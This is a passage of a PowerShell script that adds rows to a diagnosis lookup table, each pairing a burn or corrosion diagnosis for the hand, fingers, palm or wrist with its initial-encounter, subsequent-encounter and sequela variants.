thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of single left finger (nail) except thumb","Burn of third degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of single left finger (nail) except thumb","Burn of third degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified single finger (nail) except thumb","Burn of third degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified single finger (nail) except thumb","Burn of third degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified single finger (nail) except thumb","Burn of third degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple right fingers (nail), not including thumb","Burn of third degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple right fingers (nail), not including thumb","Burn of third degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple right fingers (nail), not including thumb","Burn of third degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple left fingers (nail), not including thumb","Burn of third degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple left fingers (nail), not including thumb","Burn of third degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple left fingers (nail), not including thumb","Burn of third degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified multiple fingers (nail), not including thumb","Burn of third degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified multiple fingers (nail), not including thumb","Burn of third degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified multiple fingers (nail), not including thumb","Burn of third degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple right fingers (nail), including thumb","Burn of third degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple right fingers (nail), including thumb","Burn of third degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple right fingers (nail), including thumb","Burn of third degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple left fingers (nail), including thumb","Burn of third degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple left fingers (nail), including thumb","Burn of third degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple left fingers (nail), including thumb","Burn of third degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified multiple fingers (nail), including thumb","Burn of third degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified multiple fingers (nail), including thumb","Burn of third degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified multiple fingers (nail), including thumb","Burn of third degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right palm","Burn of third degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right palm","Burn of third degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right palm","Burn of third degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left palm","Burn of third degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left palm","Burn of third degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left palm","Burn of third degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified palm","Burn of third degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified palm","Burn of third degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified palm","Burn of third degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of right hand","Burn of third degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of right hand","Burn of third degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of right hand","Burn of third degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of left hand","Burn of third degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of left hand","Burn of third degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of left hand","Burn of third degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of unspecified hand","Burn of third degree of back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of unspecified hand","Burn of third degree of back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of back of unspecified hand","Burn of third degree of back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right wrist","Burn of third degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right wrist","Burn of third degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right wrist","Burn of third degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left wrist","Burn of third degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left wrist","Burn of third degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left wrist","Burn of third degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified wrist","Burn of third degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified wrist","Burn of third degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified wrist","Burn of third degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right wrist and hand","Burn of third degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right wrist and hand","Burn of third degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right wrist and hand","Burn of third degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left wrist and hand","Burn of third degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left wrist and hand","Burn of third degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left wrist and hand","Burn of third degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified wrist and hand","Burn of third degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified wrist and hand","Burn of third degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified wrist and hand","Burn of third degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right hand, unspecified site","Corrosion of unspecified degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right hand, unspecified site","Corrosion of unspecified degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right hand, unspecified site","Corrosion of unspecified degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left hand, unspecified site","Corrosion of unspecified degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left hand, unspecified site","Corrosion of unspecified degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left hand, unspecified site","Corrosion of unspecified degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified hand, unspecified site","Corrosion of unspecified degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified hand, unspecified site","Corrosion of unspecified degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified hand, unspecified site","Corrosion of unspecified degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right thumb (nail)","Corrosion of unspecified degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right thumb (nail)","Corrosion of unspecified degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right thumb (nail)","Corrosion of unspecified degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left thumb (nail)","Corrosion of unspecified degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left thumb (nail)","Corrosion of unspecified degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left thumb (nail)","Corrosion of unspecified degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified thumb (nail)","Corrosion of unspecified degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified thumb (nail)","Corrosion of unspecified degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified thumb (nail)","Corrosion of unspecified degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of single right finger (nail) except thumb","Corrosion of unspecified degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of single right finger (nail) except thumb","Corrosion of unspecified degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of single right finger (nail) except thumb","Corrosion of unspecified degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of single left finger (nail) except thumb","Corrosion of unspecified degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of single left finger (nail) except thumb","Corrosion of unspecified degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of single left finger (nail) except thumb","Corrosion of unspecified degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified single finger (nail) except thumb","Corrosion of unspecified degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified single finger (nail) except thumb","Corrosion of unspecified degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified single finger (nail) except thumb","Corrosion of unspecified degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple right fingers (nail), not including thumb","Corrosion of unspecified degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple right fingers (nail), not including thumb","Corrosion of unspecified degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple right fingers (nail), not including thumb","Corrosion of unspecified degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple left fingers (nail), not including thumb","Corrosion of unspecified degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple left fingers (nail), not including thumb","Corrosion of unspecified degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple left fingers (nail), not including thumb","Corrosion of unspecified degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified multiple fingers (nail), not including thumb","Corrosion of unspecified degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified multiple fingers (nail), not including thumb","Corrosion of unspecified degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified multiple fingers (nail), not including thumb","Corrosion of unspecified degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple right fingers (nail), including thumb","Corrosion of unspecified degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple right fingers (nail), including thumb","Corrosion of unspecified degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple right fingers (nail), including thumb","Corrosion of unspecified degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple left fingers (nail), including thumb","Corrosion of unspecified degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple left fingers (nail), including thumb","Corrosion of unspecified degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple left fingers (nail), including thumb","Corrosion of unspecified degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified multiple fingers (nail), including thumb","Corrosion of unspecified degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified multiple fingers (nail), including thumb","Corrosion of unspecified degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified multiple fingers (nail), including thumb","Corrosion of unspecified degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right palm","Corrosion of unspecified degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right palm","Corrosion of unspecified degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right palm","Corrosion of unspecified degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left palm","Corrosion of unspecified degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left palm","Corrosion of unspecified degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left palm","Corrosion of unspecified degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified palm","Corrosion of unspecified degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified palm","Corrosion of unspecified degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified palm","Corrosion of unspecified degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of right hand","Corrosion of unspecified degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of right hand","Corrosion of unspecified degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of right hand","Corrosion of unspecified degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of left hand","Corrosion of unspecified degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of left hand","Corrosion of unspecified degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of left hand","Corrosion of unspecified degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of unspecified hand","Corrosion of unspecified degree of back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of unspecified hand","Corrosion of unspecified degree of back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of back of unspecified hand","Corrosion of unspecified degree of back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right wrist","Corrosion of unspecified degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right wrist","Corrosion of unspecified degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right wrist","Corrosion of unspecified degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left wrist","Corrosion of unspecified degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left wrist","Corrosion of unspecified degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left wrist","Corrosion of unspecified degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified wrist","Corrosion of unspecified degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified wrist","Corrosion of unspecified degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified wrist","Corrosion of unspecified degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right wrist and hand","Corrosion of unspecified degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right wrist and hand","Corrosion of unspecified degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right wrist and hand","Corrosion of unspecified degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left wrist and hand","Corrosion of unspecified degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left wrist and hand","Corrosion of unspecified degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left wrist and hand","Corrosion of unspecified degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified wrist and hand","Corrosion of unspecified degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified wrist and hand","Corrosion of unspecified degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified wrist and hand","Corrosion of unspecified degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right hand, unspecified site","Corrosion of first degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right hand, unspecified site","Corrosion of first degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right hand, unspecified site","Corrosion of first degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left hand, unspecified site","Corrosion of first degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left hand, unspecified site","Corrosion of first degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left hand, unspecified site","Corrosion of first degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified hand, unspecified site","Corrosion of first degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified hand, unspecified site","Corrosion of first degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified hand, unspecified site","Corrosion of first degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right thumb (nail)","Corrosion of first degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right thumb (nail)","Corrosion of first degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right thumb (nail)","Corrosion of first degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left thumb (nail)","Corrosion of first degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left thumb (nail)","Corrosion of first degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left thumb (nail)","Corrosion of first degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified thumb (nail)","Corrosion of first degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified thumb (nail)","Corrosion of first degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified thumb (nail)","Corrosion of first degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of single right finger (nail) except thumb","Corrosion of first degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of single right finger (nail) except thumb","Corrosion of first degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of single right finger (nail) except thumb","Corrosion of first degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of single left finger (nail) except thumb","Corrosion of first degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of single left finger (nail) except thumb","Corrosion of first degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of single left finger (nail) except thumb","Corrosion of first degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified single finger (nail) except thumb","Corrosion of first degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified single finger (nail) except thumb","Corrosion of first degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified single finger (nail) except thumb","Corrosion of first degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple right fingers (nail), not including thumb","Corrosion of first degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple right fingers (nail), not including thumb","Corrosion of first degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple right fingers (nail), not including thumb","Corrosion of first degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple left fingers (nail), not including thumb","Corrosion of first degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple left fingers (nail), not including thumb","Corrosion of first degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple left fingers (nail), not including thumb","Corrosion of first degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified multiple fingers (nail), not including thumb","Corrosion of first degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified multiple fingers (nail), not including thumb","Corrosion of first degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified multiple fingers (nail), not including thumb","Corrosion of first degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple right fingers (nail), including thumb","Corrosion of first degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple right fingers (nail), including thumb","Corrosion of first degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple right fingers (nail), including thumb","Corrosion of first degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple left fingers (nail), including thumb","Corrosion of first degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple left fingers (nail), including thumb","Corrosion of first degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple left fingers (nail), including thumb","Corrosion of first degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified multiple fingers (nail), including thumb","Corrosion of first degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified multiple fingers (nail), including thumb","Corrosion of first degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified multiple fingers (nail), including thumb","Corrosion of first degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right palm","Corrosion of first degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right palm","Corrosion of first degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right palm","Corrosion of first degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left palm","Corrosion of first degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left palm","Corrosion of first degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left palm","Corrosion of first degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified palm","Corrosion of first degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified palm","Corrosion of first degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified palm","Corrosion of first degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of right hand","Corrosion of first degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of right hand","Corrosion of first degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of right hand","Corrosion of first degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of left hand","Corrosion of first degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of left hand","Corrosion of first degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of left hand","Corrosion of first degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of unspecified hand","Corrosion of first degree of back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of unspecified hand","Corrosion of first degree of back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of back of unspecified hand","Corrosion of first degree of back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right wrist","Corrosion of first degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right wrist","Corrosion of first degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right wrist","Corrosion of first degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left wrist","Corrosion of first degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left wrist","Corrosion of first degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left wrist","Corrosion of first degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified wrist","Corrosion of first degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified wrist","Corrosion of first degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified wrist","Corrosion of first degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right wrist and hand","Corrosion of first degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right wrist and hand","Corrosion of first degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right wrist and 